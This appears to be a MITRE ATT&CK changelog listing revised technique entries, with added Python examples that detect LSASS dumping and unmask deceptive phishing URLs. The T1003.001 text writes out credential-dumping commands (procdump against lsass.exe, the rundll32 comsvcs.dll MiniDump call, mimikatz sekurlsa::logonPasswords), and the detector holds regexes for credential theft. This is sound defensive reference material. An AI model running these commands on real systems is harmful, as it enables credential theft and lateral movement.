- description (new): After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP) For example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces. Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)
- external_references[2]['source_name']: THE FINANCIAL TIMES LTD 2019. → Int SP - chat apps
- external_references[2]['description']: THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved October 8, 2019. → Microsoft Threat Intelligence. (2023, August 2). Midnight Blizzard conducts targeted social engineering over Microsoft Teams. Retrieved February 16, 2024.
- external_references[2]['url']: https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6 → https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/
- x_mitre_version: 1.2 → 1.3
iterable_item_added
- external_references: {'source_name': 'Trend Micro - Int SP', 'description': 'Trend Micro. (n.d.). Retrieved February 16, 2024.', 'url': 'https://www.trendmicro.com/en_us/research.html'}

[T1003.001] OS Credential Dumping: LSASS Memory

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)

Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

New Description

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as `comsvcs.dll` can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)

Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)

Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
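Each of the dump paths the new description enumerates (procdump, the comsvcs.dll MiniDump export, a WerFault.exe dump produced through silent process exit, and a freshly registered SSP) leaves a distinct telemetry footprint. The block below is an added example, not code from this changelog or from ATT&CK, showing detection logic run over constructed Sysmon-style events. The two `Security Packages` values are the ones the technique text quotes; the `Image File Execution Options` and `SilentProcessExit` key paths are Microsoft's documented silent-process-exit configuration and are an assumption not stated on this page, as are the event field names.

```python
"""Detection logic for the LSASS dumping paths named in T1003.001.

Added example; not code from the ATT&CK changelog. The events below are
constructed, and the field names (kind/image/command_line/target) are an
assumption modelled on Sysmon-style process, registry and file telemetry.
"""
import re
from dataclasses import dataclass

# Command lines for the dump tools the technique text quotes.
PROC_PATTERNS = {
    "procdump-lsass": re.compile(r"procdump(64)?(\.exe)?\s.*-ma\s+lsass", re.I),
    "comsvcs-minidump": re.compile(r"comsvcs\.dll\s+MiniDump\b", re.I),
    "mimikatz-sekurlsa": re.compile(r"sekurlsa::(minidump|logonpasswords)", re.I),
}

# Registry writes. The two Security Packages values are quoted in the
# technique text; the IFEO / SilentProcessExit paths are Microsoft's
# documented silent-process-exit configuration (assumption: not on the page).
REG_PATTERNS = {
    "ssp-registered": re.compile(
        r"\\Control\\Lsa(\\OSConfig)?\\Security Packages$", re.I),
    "silent-exit-lsass": re.compile(
        r"\\(Image File Execution Options|SilentProcessExit)\\lsass\.exe(\\|$)", re.I),
}

# Files: WerFault.exe writing a dump whose name refers to lsass.
LSASS_DUMP_FILE = re.compile(r"lsass[^\\]*\.dmp$", re.I)


@dataclass
class Event:
    kind: str            # "process", "registry" or "file"
    image: str           # process that ran the command / wrote the key or file
    command_line: str = ""
    target: str = ""     # registry value path or file path


def classify(ev: Event) -> list:
    """Return the detection tags an event triggers (empty list if benign)."""
    tags = []
    if ev.kind == "process":
        tags += [t for t, p in PROC_PATTERNS.items() if p.search(ev.command_line)]
    elif ev.kind == "registry":
        tags += [t for t, p in REG_PATTERNS.items() if p.search(ev.target)]
    elif ev.kind == "file":
        if ev.image.lower().endswith("werfault.exe") and LSASS_DUMP_FILE.search(ev.target):
            tags.append("werfault-lsass-dump")
    return tags


def scan(events) -> list:
    """(index, tag) for every hit across a stream of events."""
    return [(i, t) for i, ev in enumerate(events) for t in classify(ev)]


# Constructed sample telemetry: five malicious events and two benign ones.
SAMPLE_EVENTS = [
    Event("process", "cmd.exe",
          command_line=r"procdump.exe -accepteula -ma lsass.exe C:\temp\l.dmp"),
    Event("process", "cmd.exe",
          command_line=r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 712 C:\temp\lsass.dmp full"),
    Event("registry", "reg.exe",
          target=r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages"),
    Event("registry", "reg.exe",
          target=r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe\ReportingMode"),
    Event("file", r"C:\Windows\System32\WerFault.exe",
          target=r"C:\temp\lsass.exe.712.dmp"),
    Event("process", "explorer.exe", command_line="notepad.exe readme.txt"),
    Event("file", r"C:\Windows\System32\WerFault.exe",
          target=r"C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A2B.tmp.dmp"),
]

if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {tag}")
```

A WerFault.exe dump named after lsass.exe is high-signal on its own because LSASS rarely crashes, which is why the "File: File Creation" data source is added to this technique. The `Security Packages` value is also touched by some legitimate security products at install time, so in production join that registry hit with the writing image and compare the new list against a known baseline before alerting.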

New Detections:

Details
values_changed
STIX Field | Old value | New value
modified | 2023-07-24 18:52:29.338000+00:00 | 2023-12-27 17:57:20.003000+00:00

description (old value): Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

description (new value): Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as `comsvcs.dll` can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Similar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS) Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4
iterable_item_added
STIX Field | Old value | New value
external_references | (none) | {'source_name': 'Deep Instinct LSASS', 'description': 'Gilboa, A. (2021, February 16). LSASS Memory Dumps are Stealthier than Ever Before - Part 2. Retrieved December 27, 2023.', 'url': 'https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2'}
x_mitre_data_sources | (none) | File: File Creation

[T1608.005] Stage Capabilities: Link Target

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)

New Description

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001).

Links can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)

Adversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)
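The new paragraph on masking the true destination by abusing the URL schema is easiest to understand by parsing a few such links the way a browser does. The block below is an added example, not code from this changelog or from the cited Kaspersky or Mandiant posts. The specific tricks it models (a trusted-looking name in the userinfo component before `@`, a trusted name used as a subdomain label or path segment of an attacker-controlled domain, and a host written as a decimal or hex integer) are assumptions about what "schema abuse" covers; the `TRUSTED` list and the sample URLs are constructed.

```python
"""Recover the host a browser will actually contact from a phishing URL
that abuses the URL schema to mask its destination.

Added example; not code from the ATT&CK changelog or the cited posts.
Assumptions not stated on the page: the masking tricks modelled are a
trusted-looking name in the userinfo component ("https://trusted@attacker"),
a trusted name used as a subdomain label or path segment of an attacker
domain, and a host written as a decimal or hex integer. TRUSTED and the
sample URLs are constructed.
"""
import ipaddress
from urllib.parse import urlsplit

TRUSTED = ("login.microsoftonline.com", "accounts.example.com")


def normalize_host(host: str) -> str:
    """Map integer-form hosts (2130706433, 0x7f000001) to dotted quads."""
    h = host.lower()
    try:
        n = int(h, 16) if h.startswith("0x") else int(h)
    except ValueError:
        return h
    return str(ipaddress.IPv4Address(n)) if 0 <= n <= 0xFFFFFFFF else h


def is_trusted(host: str) -> bool:
    """Exact match or a genuine subdomain of a trusted host."""
    return any(host == t or host.endswith("." + t) for t in TRUSTED)


def analyze(url: str) -> dict:
    """Return the real host, whether it is trusted, and every place a
    trusted-looking name appears where it has no effect on routing."""
    parts = urlsplit(url)
    real_host = normalize_host(parts.hostname or "")
    lures = []
    if parts.username:            # everything before '@' is userinfo, not the host
        lures.append(("userinfo", parts.username))
    tail = (parts.path + "?" + parts.query).lower()
    for t in TRUSTED:
        if t in tail:
            lures.append(("path", t))
        if t in real_host and not is_trusted(real_host):
            lures.append(("host-label", t))   # e.g. trusted.com.attacker.example
    return {"real_host": real_host, "trusted": is_trusted(real_host), "lures": lures}


# Constructed sample URLs; attacker.example uses the reserved .example TLD.
SAMPLE_URLS = [
    "https://login.microsoftonline.com/common/oauth2",            # genuine
    "https://login.microsoftonline.com@attacker.example/o/auth",   # userinfo lure
    "https://attacker.example/login.microsoftonline.com/",         # path lure
    "https://login.microsoftonline.com.attacker.example/",         # subdomain lure
    "https://accounts.example.com@2130706433/",                    # userinfo + decimal host
    "https://0x7f000001/",                                         # hex host
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(u, "->", analyze(u))
```

The point of `normalize_host` is that a mail filter comparing the host string against an allow-list will pass `2130706433` while the browser connects to 127.0.0.1; normalize first, then compare. For the subdomain case a production version should use the public suffix list rather than the suffix check here, which treats anything ending in a trusted name as genuine.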
Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-11 23:20:48.603000+00:00 | 2024-04-13 14:03:24.673000+00:00

description (old value): Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)

description (new value): Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking) Adversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)

x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4
iterable_item_added
STIX Field | Old value | New value
external_references | (none) | {'source_name': 'URI Unique', 'description': 'Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.', 'url': 'https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF'}
external_references | (none) | {'source_name': 'Kaspersky-masking', 'description': 'Dedenok, Roman. (2023, December 12). How cybercriminals disguise URLs. Retrieved January 17, 2024.', 'url': 'https://www.kaspersky.com/blog/malicious-redirect-methods/50045/'}
external_references | (none) | {'source_name': 'URI', 'description': 'Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.', 'url': 'https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits'}
external_references | (none) | {'source_name': 'URI Use', 'description': 'Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.', 'url': 'https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf'}
external_references | (none) | {'source_name': 'iOS URL Scheme', 'description': 'Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.', 'url': 'https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html'}
external_references | (none) | {'source_name': 'Cofense-redirect', 'description': 'Raymond, Nathaniel. (2023, August 16). Major Energy Company Targeted in Large QR Code Phishing Campaign. Retrieved January 17, 2024.', 'url': 'https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/'}
external_references | (none) | {'source_name': 'mandiant-masking', 'description': "Simonian, Nick. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved January 17, 2024.", 'url': 'https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse'}
x_mitre_contributors | (none) | Hen Porcilan
x_mitre_contributors | (none) | Diyar Saadi Ali
x_mitre_contributors | (none) | Nikola Kovac

[T1071.003] Application Layer Protocol: Mail Protocols

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.

Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

New Description

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.

Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: FireEye APT28)
Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | (none) | 3.2.0
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-10-21 16:35:45.633000+00:00 | 2024-04-16 12:28:59.928000+00:00

description (old value): Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

description (new value): Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: FireEye APT28)

x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
external_references | (none) | {'source_name': 'FireEye APT28', 'description': 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.', 'url': 'https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf'}
x_mitre_platforms | (none) | Network

[T1036] Masquerading

Current version: 1.7

Version changed from: 1.6 → 1.7


Old Description

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.

New Description

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-15 09:52:11.875000+00:00 | 2024-03-08 17:00:59.133000+00:00

